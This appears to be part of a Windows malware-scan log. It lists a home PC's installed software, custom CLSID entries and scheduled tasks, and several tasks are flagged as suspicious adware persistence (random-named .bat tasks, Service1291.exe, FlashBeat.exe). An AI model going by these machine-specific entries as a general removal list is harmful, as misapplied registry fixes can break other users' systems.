iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&amp;installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AD93C7FC-914F-430E-BD55-B2C2535F4E94} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
